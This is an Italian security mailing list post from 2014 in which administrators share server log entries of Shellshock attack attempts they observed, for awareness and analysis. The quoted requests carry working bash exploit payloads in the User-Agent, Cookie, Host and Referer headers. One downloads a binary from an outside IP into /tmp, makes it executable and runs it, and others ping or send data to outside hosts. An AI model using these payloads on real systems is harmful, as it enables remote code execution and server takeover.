Il 25/09/2014 13:20, P@sKy ha scritto:
> E perchè mai hai oscurato l'indirizzo reale del collettore
> dell'attaccante?
>
> Anche da noi è arrivata la stessa cosa...
>
> [25/Sep/2014:12:33:19 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0"
> 404 382 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
Perché non ero sicuro del coinvolgimento di 198.101.206.138
Comunque eccone un altro:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1{0D}{0A}
User-Agent: Thanks-Rob{0D}{0A}
Cookie:() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod
777 /tmp/b
esh; /tmp/besh;{0D}{0A}
Host:() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777
/tmp/bes
h; /tmp/besh;{0D}{0A}
Referer:() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod
777 /tmp/
besh; /tmp/besh;{0D}{0A}
{0D}{0A}
E un altro, che sta studiando, 1 solo tentativo:
GET / HTTP/1.1{0D}{0A}
User-Agent: () { :; }; echo -e "Content-Type: text/plain\n"; echo
qQQQQQq{0D}
{0A}
Host: ferrovieabbandonate.it{0D}{0A}
Accept: */*{0D}{0A}
{0D}{0A}
Un altro solitario:
GET / HTTP/1.1{0D}{0A}
User-Agent: () { :;}; echo shellshock-scan >
/dev/udp/pwn.nixon-security.se/4444
{0D}{0A}
Host: unimi.it{0D}{0A}
Accept: */*{0D}{0A}
{0D}{0A}
Jan
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
